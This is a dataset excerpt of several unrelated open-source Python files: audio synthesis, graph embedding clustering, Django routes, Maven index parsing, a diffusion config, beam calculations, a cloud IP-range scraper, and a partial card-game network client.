generator.\n\n ::\n\n >>> supriya.ugens.Linen.kr()\n Linen.kr()\n\n \"\"\"\n\n _has_done_flag = True\n _ordered_input_names = collections.OrderedDict(\n [\n (\"gate\", 1.0),\n (\"attack_time\", 0.01),\n (\"sustain_level\", 1.0),\n (\"release_time\", 1.0),\n (\"done_action\", 0),\n ]\n )\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n","sub_path":"supriya/ugens/envelopes.py","file_name":"envelopes.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"649295981","text":"import pandas as pd\nimport numpy as np\nimport os\nimport tensorflow as tf\nimport pickle\nfrom sklearn.cluster import KMeans\nimport time\n# pd.set_option('display.max_rows',None)\nclass Collector:\n\n def __init__(self, path=\"../data/WN18/\", num_r=5, num_E=1000):\n self.import_data(path)\n self.num_r = num_r\n self.num_E = num_E\n\n def import_data(self, path):\n # self.entities = pd.read_csv(os.path.join(path, \"entity2id.txt\"), skiprows=1,\n # names=[\"entity\", \"id\"], header=None, sep=\"\\t\", index_col=\"id\")\n # self.relations = pd.read_csv(os.path.join(path,\"relation2id.txt\"), skiprows=1,\n # names=[\"relation\", \"id\"], header=None, sep=\"\\t\",index_col=\"id\")\n with open(os.path.join(path, \"entity2id.txt\")) as ent_file:\n self.ent_size = int(ent_file.readline())\n with open(os.path.join(path, \"relation2id.txt\")) as REL_file:\n self.REL_size = int(REL_file.readline())\n self.trains = pd.read_csv(os.path.join(path, \"train2id.txt\"), skiprows=1,\n names=[\"head\", \"tail\", \"RELATION\"], header=None, sep=\" \")\n 
self.train_size = len(self.trains)\n with open(os.path.join(path, \"embeddings.pkl\"), 'rb') as f:\n self.parameter_lists = pickle.load(f)\n\n self.sess = tf.Session()\n self.ent_embeddings = tf.Variable(initial_value=self.parameter_lists[\"ent_embeddings\"])\n self.REL_embeddings = tf.Variable(initial_value=self.parameter_lists[\"rel_embeddings\"])\n\n self.sess.run(tf.global_variables_initializer())\n print(self.ent_size, \"entities loaded...\")\n print(self.REL_size, \"RELATIONs loaded...\")\n\n def cluster(self):\n groups = self.trains.groupby(self.trains[u'RELATION'])\n clustered = pd.DataFrame(columns=list(self.trains.columns)+[\"relation\"])\n self.rel_embeddings = np.empty(shape=[0, self.ent_embeddings.shape[1]], dtype=np.float32)\n for group in groups:\n if len(group[1]) >= self.num_r:\n num_clusters = self.num_r\n else:\n num_clusters = len(group[1])\n heads = self.sess.run(tf.squeeze(tf.nn.embedding_lookup(self.ent_embeddings, group[1][['head']])))\n tails = self.sess.run(tf.squeeze(tf.nn.embedding_lookup(self.ent_embeddings, group[1][['tail']])))\n difference = tails - heads\n # print(type(heads), heads.shape)\n # print(type(difference), difference.shape)\n estimator = KMeans(n_clusters=num_clusters)\n estimator.fit(difference)\n rel_label = [self.num_r * group[0] + i for i in estimator.labels_]\n\n buffer = group[1].reset_index(drop=True)\n buffer['relation'] = pd.Series(rel_label, dtype=np.int32)\n clustered = pd.concat([clustered, buffer], ignore_index=True)\n self.rel_embeddings = np.append(self.rel_embeddings, estimator.cluster_centers_, axis=0)\n print(\"finish relation clustering, id: \", group[0])\n\n self.trains = clustered\n self.trains.reset_index(drop=True)\n # print(self.trains)\n HEAD = pd.Series(np.empty([self.train_size]), dtype=np.int32)\n TAIL = pd.Series(np.empty([self.train_size]), dtype=np.int32)\n entities = self.sess.run(self.ent_embeddings)\n estimator = KMeans(n_clusters=self.num_E)\n estimator.fit(entities)\n\n for index, row in self.trains.iterrows():\n HEAD[index] = estimator.labels_[row['head']]\n TAIL[index] = estimator.labels_[row['tail']]\n self.trains['HEAD'] = HEAD\n self.trains['TAIL'] = TAIL\n self.ENT_embeddings = estimator.cluster_centers_.astype(np.float32)\n print(\"finish entity clustering.\")\n print(\"finish clustering.\")\n\n clustering_and_embeddings = {\"clustering\": self.trains, \"ENT_embeddings\": self.ENT_embeddings,\n \"rel_embeddings\": self.rel_embeddings, \"ent_size\":self.ent_size,\n \"REL_size\":self.REL_size, \"ent_clusters\":estimator.labels_}\n with open(\"clustering_and_embeddings.pkl\", \"wb\") as clt:\n pickle.dump(clustering_and_embeddings, clt)\n\nif __name__ == \"__main__\":\n collector = Collector()\n collector.cluster()","sub_path":"models_asynchronized/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"419553236","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.IndexPageView.as_view(), name='index_view'),\n url(r'^chat/$', views.ChatView.as_view(), name='chat_view'),\n url(r'^message/send/$',\n views.MessageCreateView.as_view(), name='send_view'),\n url(r'^message/get$', views.MessagesView.as_view(), name='get_view'),\n]\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"549489829","text":"import os\nfrom typing import List\n\nfrom lxml import objectify\n\nfrom pymaven import repo\nfrom pymaven.artifact import Artifact\n\nmaster_index = \"master-index.xml\"\ngroup_index = \"group-index.xml\"\n\n\ndef fetch_master_index(_dest_dir: str) -> str:\n master_index_file = os.path.join(_dest_dir, master_index)\n\n repo.fetch_file(master_index, master_index_file, overwrite=True)\n\n return master_index_file\n\n\ndef parse_master_index(_file: str) -> List[str]:\n with open(_file) as f:\n # force utf-8, otherwise fromstring throws the following error\n # Unicode strings with encoding declaration are not supported\n xml_string = f.read().encode(\"utf-8\")\n\n xml_obj = objectify.fromstring(xml_string)\n\n return sorted(list(map(lambda x: x.tag, xml_obj.getchildren())))\n\n\ndef to_url_path(_group_id: str) -> str:\n return _group_id.replace(\".\", \"/\")\n\n\ndef fetch_group_index(_dest_root_dir: str, _group_id: str) -> str:\n print(\"fetching group: {}\".format(_group_id))\n\n _group_id_url = to_url_path(_group_id)\n\n _dest_dir = os.path.join(_dest_root_dir, _group_id_url)\n\n # ensure the destination dir exists\n os.makedirs(_dest_dir, exist_ok=True)\n\n group_index_file = os.path.join(_dest_dir, group_index)\n\n repo.fetch_file(_group_id_url + \"/\" + group_index, group_index_file, overwrite=True)\n\n return group_index_file\n\n\ndef parse_group_index(_file: str) -> List[Artifact]:\n print(\"parsing group: {}\".format(_file))\n\n with open(_file) as f:\n # force utf-8, otherwise fromstring throws the following error\n # Unicode strings with encoding declaration are not supported\n xml_string = f.read().encode(\"utf-8\")\n\n xml_obj = objectify.fromstring(xml_string)\n\n group_id = xml_obj.tag\n\n artifacts = []\n for artifact in xml_obj.getchildren():\n for version in artifact.attrib[\"versions\"].split(\",\"):\n artifacts.append(Artifact(group_id, artifact.tag, version))\n\n return artifacts\n","sub_path":"pymaven/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"238512155","text":"# Copyright (c) OpenMMLab. 
All rights reserved.\nfrom mmengine.config import read_base\n\nwith read_base():\n    from .adm_ddim250_8xb32_imagenet_256x256 import *\n\nfrom mmagic.evaluation.metrics import FrechetInceptionDistance\nfrom mmagic.models.editors.guided_diffusion.classifier import EncoderUNetModel\n\nmodel.update(\n    dict(\n        classifier=dict(\n            type=EncoderUNetModel,\n            image_size=256,\n            in_channels=3,\n            model_channels=128,\n            out_channels=1000,\n            num_res_blocks=2,\n            attention_resolutions=(8, 16, 32),\n            channel_mult=(1, 1, 2, 2, 4, 4),\n            use_fp16=False,\n            num_head_channels=64,\n            use_scale_shift_norm=True,\n            resblock_updown=True,\n            pool='attention')))\n\nmetrics = [\n    dict(\n        type=FrechetInceptionDistance,\n        prefix='FID-Full-50k',\n        fake_nums=50000,\n        inception_style='StyleGAN',\n        sample_model='orig',\n        sample_kwargs=dict(\n            num_inference_steps=250, show_progress=True, classifier_scale=1.))\n]\n\nval_evaluator = dict(metrics=metrics)\ntest_evaluator = dict(metrics=metrics)\n","sub_path":"mmagic/configs/guided_diffusion/adm-g_ddim25_8xb32_imagenet_256x256.py","file_name":"adm-g_ddim25_8xb32_imagenet_256x256.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
{"seq_id":"499122432","text":"#!/usr/bin/env python\n\n\"\"\"A Python program to calculate simple beam deflection with UDL\"\"\"\nimport math\n\n#Input Variables\nSpan=3.8 #m\n\nDeflection_limit = Span/360 #span/deflection limit\nE = 200000 #MPa\nPhi_bending = 0.9\nf_sy=250 #MPa\n\n#DISTRIBUTED LOADS\nL_width=1.2 #m\nG = 1.5 #kPa\nQ = 1.5 #kPa\n\n\n#Convert Input to SI units\nG = G*1e3 #convert from kPa to Pa\nQ = Q*1e3 #convert from kPa to Pa\nE = E*1e6 #convert from MPa to Pa\nf_sy = f_sy *1e6 #convert from MPa to Pa\n\n#Check Service Deflection\nW_service = Span*L_width*(G+Q) #N\nIx_reqd = (5*W_service*Span**3)/(384*E*Deflection_limit)\n\n#Check Section Capacity\nW_ultimate = Span*L_width*(1.2*G+1.5*Q) #N\nM_ultimate = (W_ultimate*Span)/8 #N.m\nZx_required = M_ultimate/(Phi_bending*f_sy) #m^3\n\n#Convert results back to kN, mm^4 and mm^3\nIx_reqd = Ix_reqd*1e6 #convert to mm^4 *1e6\nZx_required = Zx_required *1e6 #convert to mm^3 *1e3\nW_service = W_service*1e-3 # convert from N to kN\nW_ultimate = W_ultimate*1e-3 # convert from N to kN\n\n#Report Results\nprint ('Service Load (kN)=',W_service)\nprint ('Ix Required (mm^4 * 1e6)=',Ix_reqd)\nprint('Ultimate Load (kN)=', W_ultimate)\nprint ('Zx Required (mm^3 * 1e3)=',Zx_required)\n\n\n\n'''\nResults: Beam 10\nService Load (kN)= 13.679999999999998\nIx Required (mm^4 * 1e6)= 4.6298249999999985\nUltimate Load (kN)= 18.468\nZx Required (mm^3 * 1e3)= 38.988\n'''","sub_path":"Beams/Simple Beam.py","file_name":"Simple Beam.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
{"seq_id":"72440221","text":"#!/usr/bin/env python3\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n# This script provides data validation around the bloxtool CLI, which\n# retrieves Mozilla IP address ranges from a third party vendor. 
The\n# script runs as a recurring systemd task.\n\nimport ipaddress\nimport json\nimport logging\nimport subprocess\nimport sys\nimport time\nfrom pathlib import Path\n\nimport dns.resolver\nimport requests\nfrom datadiff import diff\nfrom voluptuous import (\n All,\n Optional,\n Schema,\n Invalid as VoluptuousInvalid,\n truth,\n)\nfrom voluptuous.humanize import validate_with_humanized_errors\n\n\nformatter = logging.Formatter('%(name)s %(message)s')\nformatter.converter = time.gmtime\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setFormatter(formatter)\nlogger = logging.getLogger('mozilla-ip-scraper')\nlogger.addHandler(handler)\n\n\ndef write_to_file_atomically(file_path: Path, content: str) -> None:\n '''Writes new data to a temp file, then renames the temp \n file to the existing filename'''\n temp_file_path = file_path.with_suffix('.tmp')\n with temp_file_path.open(mode='w') as temp_file:\n temp_file.write(content)\n\n temp_file_path.rename(file_path)\n\n@truth\ndef is_ip_address_network(value: str) -> bool:\n '''Validates if a given value (interpreted as a str) represents\n an IP address network'''\n try:\n # This call will raise a ValueError if value is not a valid ip address range\n ipaddress.ip_network(value, strict=True)\n return True\n\n except ValueError:\n return False\n\n@truth\ndef all_required_regions_exist(prefixes: list) -> bool:\n '''Validates that the set of all required regions is a subset\n of all the regions in the iterable of IP networks'''\n required_regions = {\n 'us-west-2',\n 'us-west-1',\n 'us-east-2',\n 'us-east-1',\n 'eu-central-1',\n }\n\n prefixes_in_new_document = {\n prefix_object['region']\n for prefix_object in prefixes\n }\n\n return required_regions <= prefixes_in_new_document\n\n\ndef get_mozilla_office_ips():\n '''Entry point for the Mozilla office IP scraper\n \n Calls out to bloxtool to obtain Mozilla network information\n in JSON format. 
Validates the JSON against a known schema and\n atomically re-writes a file with the CIDR representations of\n Mozilla office IP address spaces.\n '''\n try:\n mozilla_ip_ranges_file = Path('/var/hg/moz-ip-ranges.txt')\n bloxtool_config_file = Path('/etc/mercurial/bloxtool.ini')\n bloxtool_command = [\n '/var/hg/venv_tools/bin/bloxtool',\n 'network',\n 'search',\n 'attribute',\n 'subnet-purpose',\n 'value',\n 'nat-pool',\n '--format=json',\n f'--config={bloxtool_config_file}'\n ]\n\n bloxtool_json_schema = Schema([\n {\n 'comment': str,\n '_ref': str,\n 'network': is_ip_address_network,\n 'network_view': str,\n }\n ], extra=False, required=True)\n\n # Get raw string output and convert to Python dict\n process_output = subprocess.run(bloxtool_command, check=True, encoding='utf-8', stdout=subprocess.PIPE).stdout\n output_as_dict = json.loads(process_output)\n\n # Verify dict schema\n validate_with_humanized_errors(output_as_dict, bloxtool_json_schema)\n\n write_to_file_atomically(mozilla_ip_ranges_file, '\\n'.join(i['network'] for i in output_as_dict))\n\n\n except subprocess.CalledProcessError as cpe:\n logger.exception('An error occurred while executing the bloxtool command: exit code %s' % cpe.returncode)\n logger.exception('STDOUT: %s' % cpe.stdout)\n logger.exception('STDERR: %s' % cpe.stderr)\n sys.exit(1)\n\n except json.JSONDecodeError as jde:\n logger.exception('An error occurred parsing the bloxtool output as JSON: %s' % jde.msg)\n sys.exit(1)\n\n except VoluptuousInvalid as vi:\n logger.exception('The JSON data from bloxtool does not match the required schema.')\n logger.exception('Error message: %s' % vi.msg)\n logger.exception('Error path: %s' % vi.path)\n logger.exception('Exception message: %s' % vi.error_message)\n sys.exit(1)\n\n\ndef get_aws_ips():\n '''Entry point for the AWS IP address scraper\n \n Downloads the AWS IP ranges JSON document from Amazon and verifies against a\n known schema. Atomically rewrites a file with the CIDR representations of\n AWS IP address spaces.\n '''\n try:\n # Grab the new data from Amazon\n amazon_ip_ranges_file = Path('/var/hg/aws-ip-ranges.json')\n ip_ranges_response = requests.get('https://ip-ranges.amazonaws.com/ip-ranges.json')\n\n # Ensure 200 OK response code\n if ip_ranges_response.status_code != 200:\n sys.exit('HTTP response from Amazon was not 200 OK')\n\n # Sanity check: ensure the file is an appropriate size\n if len(ip_ranges_response.content) < 88000:\n sys.exit('The retrieved AWS JSON document is smaller than the minimum allowable file size')\n\n\n # JSON Schema for the Amazon IP Ranges JSON document\n amazon_json_schema = Schema({\n 'syncToken': str,\n 'createDate': str,\n 'ipv6_prefixes': [dict], # If IPv6 is supported in the future, this will need to be defined\n # The prefixes field must meet both requirements:\n # 1. There must be at least one entry for each region containing CI and S3 bundles\n # 2. Must be a list of dicts that fit the schema below\n 'prefixes': All(all_required_regions_exist, [\n {\n 'ip_prefix': is_ip_address_network,\n 'region': str,\n 'service': str,\n 'network_border_group': Optional(str),\n },\n ]),\n }, extra=False, required=True)\n\n\n # Validate dict schema\n output_as_dict = ip_ranges_response.json()\n validate_with_humanized_errors(output_as_dict, amazon_json_schema)\n\n # Sanity check: ensure the syncToken indicates an IP space change has been made\n # since the last recorded change. 
Only check if a file exists, in case of new deployments\n        if amazon_ip_ranges_file.is_file():\n            file_bytes = amazon_ip_ranges_file.read_bytes()\n            existing_document_as_dict = json.loads(file_bytes)\n\n            file_diff = diff(existing_document_as_dict, output_as_dict, context=0)\n\n            # Exit if the file contents are the same or the syncToken has not changed\n            if not file_diff or int(output_as_dict['syncToken']) <= int(existing_document_as_dict['syncToken']):\n                sys.exit()\n\n        else:\n            existing_document_as_dict = {} # No existing document means whole file is the diff\n            file_diff = diff(existing_document_as_dict, output_as_dict, context=0)\n\n\n        write_to_file_atomically(amazon_ip_ranges_file, json.dumps(output_as_dict))\n\n        # Print the diff for collection as systemd unit output\n        logger.info('AWS IP ranges document has been updated')\n        logger.info(file_diff)\n\n    except subprocess.CalledProcessError as cpe:\n        logger.exception('An error occurred when notifying about changes to the file: exit code %s' % cpe.returncode)\n        logger.exception('STDOUT: %s' % cpe.stdout)\n        logger.exception('STDERR: %s' % cpe.stderr)\n        sys.exit(1)\n\n    except json.JSONDecodeError as jde:\n        logger.exception('An error occurred parsing the data retrieved from Amazon as JSON: %s' % jde.msg)\n        sys.exit(1)\n\n    except VoluptuousInvalid as vi:\n        logger.exception('The JSON data from Amazon does not match the required schema.')\n        logger.exception('Error message: %s' % vi.msg)\n        logger.exception('Error path: %s' % vi.path)\n        logger.exception('Exception message: %s' % vi.error_message)\n        sys.exit(1)\n\n\ndef recursive_domain_query(dnsresolver: dns.resolver.Resolver, blocks: list, domain: str):\n    '''Perform a DNS query for `domain`, which may return more subdomains\n    which need to be queried.\n\n    GCP advertises its IP address blocks via TXT DNS records. The initial domain\n    returns a list of subdomains to query. 
Those subdomains can contain IP address\n    blocks, or further subdomains to query for more block lists.\n    '''\n    response = dnsresolver.query(domain, rdtype='txt')\n\n    if len(response) != 1:\n        logger.warning('Initial DNS query expected 1 result (actual: %d)' % len(response))\n\n    # Parse each record in the response\n    for item in response.rrset.items:\n        for field in item.to_text().split(' '):\n            if field.startswith('ip4:'):\n                ip = field[len('ip4:'):]\n                blocks.append(ip)\n            elif field.startswith('include:'):\n                subdomain = field[len('include:'):]\n                recursive_domain_query(dnsresolver, blocks, subdomain)\n\n\ndef get_gcp_ips():\n    '''Entry point for the GCP IP address scraper\n\n    Queries GCP advertised DNS records to determine GCP public IP blocks and write them\n    to disk.\n    '''\n    try:\n        gcp_ip_ranges_file = Path('/var/hg/gcp-ip-ranges.txt')\n\n        # Create a dns resolver that uses Google's nameservers\n        # Not entirely necessary but since we're querying Google's\n        # records it's probably not a bad idea\n        dnsresolver = dns.resolver.Resolver()\n        dnsresolver.nameservers = ['8.8.8.8', '8.8.4.4']\n\n        blocks = []\n\n        recursive_domain_query(dnsresolver, blocks, '_cloud-netblocks.googleusercontent.com')\n\n        if not blocks:\n            raise Exception('domain query returned no blocks')\n\n        # Write to path atomically\n        write_to_file_atomically(gcp_ip_ranges_file, '\\n'.join(blocks))\n\n    except Exception as e:\n        logger.exception('Error fetching GCP records: %s' % e)\n        sys.exit(1)\n\n\n# Register possible commands\nCOMMANDS = {\n    'aws': get_aws_ips,\n    'gcloud': get_gcp_ips,\n    'moz-offices': get_mozilla_office_ips,\n}\n\n\nif __name__ == '__main__':\n    if len(sys.argv) != 2 or sys.argv[1] not in COMMANDS:\n        sys.exit('usage: {executable} <{possible_commands}>'\n                 .format(executable=sys.argv[0], possible_commands=' | '.join(COMMANDS.keys())))\n\n    COMMANDS[sys.argv[1]]()\n    sys.exit()\n","sub_path":"scripts/scrape-manifest-ip-ranges.py","file_name":"scrape-manifest-ip-ranges.py","file_ext":"py","file_size_in_byte":10572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
{"seq_id":"58134361","text":"#!/usr/bin/env python3\nimport socket, pickle, sys, json, os, random, time\nfrom player import Player\n\nDEBUG = False\n\nPACKET_SIZE = 1024\n\nSHOW_GAME = \"S\"\nMULLIGAN = \"0\"\nDRAW_CARD = \"1\"\nTAP_LAND = \"2\"\nPLAY_CARD = \"3\"\nUSE_EFFECT = \"4\"\nSELECT = \"5\"\nATTACK = \"6\"\nBLOCK = \"7\"\nSKIP_PHASE = \"8\"\nCONCEDE = \"9\"\n\nHUMAN = \"1\"\nBOT_RANDOM = \"2\"\nBOT_SKIP = \"3\"\n\nID = 0\nLIFE = 1\nMANA = 2\nDECK = 3\nHAND = 4\nBATTLE_ZONE = 5\nLAND_ZONE = 6\nGRAVEYARD = 7\nEXILE = 8\n\nSELECTION_PLAYER = 0\nSELECTION_DECK = 1\nSELECTION_HAND = 2\nSELECTION_BATTLEZONE = 3\nSELECTION_LANDZONE = 4\nSELECTION_GRAVEYARD = 5\nSELECTION_EXILE = 6\n\nTARGET_ID = 0\nTARGET_TYPE = 1\nTARGET_POSITION = 2\n\ndef main():\n\n\tclient = None\n\n\tclient = Client()\n\n\t# Connexion au serveur principal\n\tclient.connect_server()\n\n\t# Connexion au serveur de jeu\n\tclient.connect_game()\n\n\t# Lancement de la partie\n\tresult = client.play()\n\n\t# Affichage des résultats de la partie\n\tif(result == \"VICTORY\"):\n\n\t\tprint(\"Victory !\")\n\n\telif(result == \"DEFEAT\"):\n\n\t\tprint(\"Defeat.\")\n\n\telse:\n\n\t\tprint(\"Quelque chose has gone terribly mal (:\")\n\n\tinput(\"Appuyez sur ENTER pour quitter\")\n\n\t# Déconnexion du serveur\n\tclient.disconnect()\n\n\t# Nettoyage en sortie\n\tclient.clear_terminal()\n\nclass Client:\n\n\tdef __init__(self):\n\n\t\tself.__server_socket = 
socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.__game_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.__server_netconfig = None\n\t\tself.__game_netconfig = None\n\t\tself.__player_id = -1\n\t\tself.__players = []\n\t\tself.__behaviour = \"\"\n\n\t\ttry:\n\t\t\twith open(\"JSON/ip_config.json\") as file:\n\t\t\t\tjson_string = json.load(file)\n\t\texcept Exception:\n\t\t\tsys.exit(\"Impossible d'ouvrir le fichier JSON\")\n\n\t\t# Récupération des informations réseaux du serveur\n\t\tself.__server_netconfig = (json_string['host_server'], int(json_string['port_server']))\n\n\t\t# Définition du timeout UDP\n\t\tself.__server_socket.settimeout(10.0)\n\n\tdef main_menu(self):\n\n\t\tmain_input = \"\"\n\t\tbehaviour_input = \"\"\n\n\t\twhile True:\n\n\t\t\tself.clear_terminal()\n\n\t\t\tprint(\"[ Nouvelle partie (1) ]\")\n\t\t\tprint(\"[ Rejoindre une partie (2) ]\")\n\t\t\tprint(\"[ Quitter (3) ]\")\n\n\t\t\tmain_input = input(\">\")\n\n\t\t\tif(main_input.isnumeric() and int(main_input) in range(1,4)):\n\n\t\t\t\t\tbreak\n\n\t\tif(int(main_input) in range(1,3)):\n\n\t\t\twhile True:\n\n\t\t\t\tself.clear_terminal()\n\n\t\t\t\tprint(\"HUMAN (1)\")\n\t\t\t\tprint(\"BOT_RANDOM (2)\")\n\t\t\t\tprint(\"BOT_SKIP (3)\")\n\n\t\t\t\tbehaviour_input = input(\">\")\n\n\t\t\t\tif(behaviour_input.isnumeric()):\n\n\t\t\t\t\tif(behaviour_input == HUMAN):\n\n\t\t\t\t\t\tself.__behaviour = \"HUMAN\"\n\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\telif(behaviour_input == BOT_RANDOM):\n\n\t\t\t\t\t\tself.__behaviour = \"BOT_RANDOM\"\n\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\telif(behaviour_input == BOT_SKIP):\n\n\t\t\t\t\t\tself.__behaviour = \"BOT_SKIP\"\n\n\t\t\t\t\t\tbreak\n\n\t\treturn main_input\n\n\tdef clear_terminal(self):\n\n\t\tcommand = \"clear\"\n\n\t\tif os.name == \"nt\":\n\t\t\tcommand = \"cls\"\n\n\t\tos.system(command)\n\n\tdef update(self, gamestate):\n\n\t\tfor player in gamestate:\n\n\t\t\tif(player[LIFE] != None):\n\n\t\t\t\tself.__players[player[ID]].set_life(player[LIFE])\n\n\t\t\tif(player[MANA] != None):\n\n\t\t\t\tself.__players[player[ID]].set_mana_pool(player[MANA])\n\n\t\t\tif(player[DECK] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_deck(player[DECK])\n\n\t\t\tif(player[HAND] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_hand(player[HAND])\n\n\t\t\tif(player[BATTLE_ZONE] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_battle_zone(player[BATTLE_ZONE])\n\n\t\t\tif(player[LAND_ZONE] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_land_zone(player[LAND_ZONE])\n\n\t\t\tif(player[GRAVEYARD] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_graveyard(player[GRAVEYARD])\n\n\t\t\tif(player[EXILE] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_exile(player[EXILE])\n\n\tdef send_action(self, action):\n\n\t\tserialized_data = None\n\n\t\t# Sérialisation\n\t\tserialized_data = pickle.dumps(action)\n\n\t\t# Envoi vers le serveur de jeu : Taille du segment (1)\n\t\tself.send_size(serialized_data)\n\n\t\t# Envoi vers le serveur de jeu : Segment (Requête d'action) (2)\n\t\tself.__game_socket.send(serialized_data)\n\t\t\n\t\tif(DEBUG):\n\t\t\tprint(\"REQUETE D'ACTION :\",action,\"(envoyé)\")\n\n\tdef send_size(self, segment):\n\n\t\tdata = \"\"\n\t\tserialized_data = None\n\n\t\t# Calcul de la taille du segment à envoyer passé en paramètre\n\t\tdata = '%16s' %len(segment)\n\n\t\t# Sérialisation\n\t\tserialized_data = data.encode()\n\n\t\t# Envoi vers le serveur de jeu : Taille du 
segment\n\t\tself.__game_socket.send(serialized_data)\n\n\t\tif(DEBUG):\n\t\t\tprint(int(data),\"BYTES (envoyé)\")\n\n\tdef recv_signal(self):\n\n\t\tsize = 0\n\t\tserialized_data = None\n\t\tdata = \"\"\n\n\t\t# Réception depuis le serveur de jeu : Taille du segment (1)\n\t\tsize = self.recv_size()\n\n\t\t# Réception depuis le serveur de jeu : Signal (2)\n\t\tserialized_data = self.__game_socket.recv(size)\n\n\t\t# Désérialisation\n\t\tdata = pickle.loads(serialized_data)\n\n\t\tif(DEBUG):\n\t\t\tprint(\"SIGNAL :\",data,\"(reçu)\")\n\n\t\treturn data\n\n\tdef recv_gamestate(self):\n\n\t\tsize = 0\n\t\tserialized_data = None\n\t\tdata = None\n\n\t\t# Réception depuis le serveur de jeu : Taille du segment (1)\n\t\tsize = self.recv_size()\n\n\t\t# Réception depuis le serveur de jeu : Gamestate (2)\n\t\tserialized_data = self.__game_socket.recv(size)\n\n\t\t# Désérialisation\n\t\tdata = pickle.loads(serialized_data)\n\n\t\tif(DEBUG):\n\t\t\tprint(\"GAMESTATE (reçu)\")\t\n\n\t\treturn data\t\n\n\tdef recv_size(self):\n\n\t\tdata = 0\n\t\tserialized_data = None\n\n\t\t# Réception depuis le client : Taille du segment (1)\n\t\tserialized_data = self.__game_socket.recv(16)\n\n\t\t# Désérialisation\n\t\tdata = int(serialized_data.decode())\n\n\t\tif(DEBUG):\n\t\t\tprint(data,\"BYTES (reçu)\")\n\n\t\treturn data\n\n\tdef disconnect(self):\n\n\t\tself.__game_socket.close()\n\t\tself.__server_socket.close()\n\n\tdef input(self, min_value, max_value):\n\n\t\tinput_value = -1\n\n\t\tif(self.__behaviour == \"HUMAN\"):\n\n\t\t\tinput_value = input(\">\")\n\n\t\telif(self.__behaviour == \"BOT_RANDOM\"):\n\n\t\t\tinput_value = random.randint(min_value,max_value)\n\n\t\t\t# time.sleep(0.25)\n\n\t\telif(self.__behaviour == \"BOT_SKIP\"):\n\n\t\t\tif(random.randint(0,10) > 2):\n\n\t\t\t\tinput_value = 8\n\n\t\t\telse:\n\n\t\t\t\tinput_value = 1\n\n\t\treturn str(input_value)\n\n\t# Connexion au serveur UDP\n\tdef connect_server(self):\n\n\t\tuser_input = \"\"\n\t\trequest = \"\"\n\t\traw_data = None\n\t\tdata = None\n\t\tserver_address = None\n\n\t\twhile True:\n\n\t\t\t# Menu principal\n\t\t\tuser_input = self.main_menu()\n\n\t\t\t# Rafraichissement de l'écran\n\t\t\tself.clear_terminal()\n\t\t\t\n\t\t\t# Demande de lancement d'une nouvelle partie\n\t\t\tif user_input == \"1\":\n\n\t\t\t\trequest = \"NEW_GAME\"\n\n\t\t\t\t# Envoi vers le serveur : requête initiale (1)\n\t\t\t\tself.__server_socket.sendto(request.encode(),self.__server_netconfig)\n\n\t\t\t\t# Réception depuis le serveur : réponse (2)\n\t\t\t\ttry:\n\n\t\t\t\t\traw_data,server_address = self.__server_socket.recvfrom(PACKET_SIZE)\n\t\t\t\t\tdata = pickle.loads(raw_data)\n\t\t\t\t\n\t\t\t\texcept socket.timeout:\n\t\t\t\t\t\n\t\t\t\t\tprint(\"Temps d'attente dépassé\")\n\t\t\t\t\tcontinue\n\n\t\t\t\tprint(\"Message reçu :\", data, \"de\", server_address)\n\n\t\t\t\tif(data[0] == \"ACCEPT\"):\n\t\t\t\t\t\n\t\t\t\t\tself.__game_netconfig = data[1]\n\t\t\t\t\tbreak\n\n\t\t\t\telif(data[0] == \"DECLINE\"):\n\n\t\t\t\t\tprint(data[1])\n\t\t\t\t\tcontinue\n\n\t\t\t# Demande de rejoindre une partie\n\t\t\telif user_input == \"2\":\n\n\t\t\t\trequest = \"JOIN_GAME\"\n\n\t\t\t\t# Envoi vers le serveur : requête initiale (1)\n\t\t\t\tself.__server_socket.sendto(request.encode(),self.__server_netconfig)\n\n\t\t\t\t# Réception depuis le serveur : réponse (2)\n\t\t\t\ttry:\n\n\t\t\t\t\traw_data,server_address = self.__server_socket.recvfrom(PACKET_SIZE)\n\t\t\t\t\tdata = pickle.loads(raw_data)\n\t\t\t\t\n\t\t\t\texcept 
